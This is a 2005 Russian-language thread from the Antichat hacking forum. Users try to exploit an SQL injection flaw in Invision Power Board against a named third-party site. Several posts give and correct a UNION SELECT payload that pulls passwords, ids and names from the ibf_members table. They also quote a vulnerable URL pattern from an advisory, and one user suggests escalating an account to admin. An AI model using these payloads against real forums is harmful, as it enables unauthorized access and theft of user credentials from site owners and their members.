ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу SQL-инъекция в Invision Power Board
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

SQL-инъекция в Invision Power Board
  #1  
Старый 14.04.2005, 14:09
Юличка
Новичок
Регистрация: 13.06.2004
Сообщений: 9
Провел на форуме:
72795

Репутация: 1
Exclamation SQL-инъекция в Invision Power Board
Сразу к делу вот просто форум

http://masichka.novoross.ru/forum/index.php

далее я сформироваю URL вот такой:

http://masichka.novoross.ru/forum/in...=SQL_INJECTION

вылетает окно и что дальше??
 
Ответить с цитированием

  #2  
Старый 14.04.2005, 18:38
CunningFox
Познающий
Регистрация: 03.03.2005
Сообщений: 66
Провел на форуме:
0

Репутация: 0
Отправить сообщение для CunningFox с помощью ICQ
По умолчанию
ошиба это..
 
Ответить с цитированием

  #3  
Старый 15.04.2005, 10:24
GaD
Новичок
Регистрация: 07.04.2005
Сообщений: 20
Провел на форуме:
43505

Репутация: 0
По умолчанию
Ну и?
 
Ответить с цитированием

  #4  
Старый 15.04.2005, 11:16
GaD
Новичок
Регистрация: 07.04.2005
Сообщений: 20
Провел на форуме:
43505

Репутация: 0
По умолчанию
%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0 ,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

С таким запросом не работает, а в чем ошибка?
 
Ответить с цитированием

  #5  
Старый 15.04.2005, 15:20
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
Цитата:
Сообщение от GaD  
%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0 ,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

С таким запросом не работает, а в чем ошибка?
Ну во первых
1,100%20UNION%20SELECT%200,0,password,id,name,0,0, 0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
А во-вторых все равно работать не будет, поскольку ORDER BY несовместимо с UNION
 
Ответить с цитированием

  #6  
Старый 15.04.2005, 16:14
SEVKA
Новичок
Регистрация: 14.03.2005
Сообщений: 13
Провел на форуме:
15240

Репутация: 0
По умолчанию
Вот читаю на секюрити лаб

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных уязвимого приложения.

Пример:

http://[target]/forums/index.php?act=Members
&max_results=30&filter=1&sort_order=asc&
sort_key=name&st=SQL_INJECTION

----------------------------------------------------------------------------------

И кто мне доступно обяснит как этим пользоваться ?
 
Ответить с цитированием

  #7  
Старый 15.04.2005, 17:10
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию
SQL_INJECTION

тут sql язык надо знать хорошо =\
типа создание таблиц перемещиние и т.д. с помощью этого можно свой аккаунт допустим сделать админским.
 
Ответить с цитированием

  #8  
Старый 16.04.2005, 11:46
GaD
Новичок
Регистрация: 07.04.2005
Сообщений: 20
Провел на форуме:
43505

Репутация: 0
По умолчанию
круто... и правда работает и правда материться на использование Union и Order By, а вобще можно заюзать как нибудь этот баг?
 
Ответить с цитированием

  #9  
Старый 16.04.2005, 12:05
GaD
Новичок
Регистрация: 07.04.2005
Сообщений: 20
Провел на форуме:
43505

Репутация: 0
По умолчанию
Ну ё мое
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ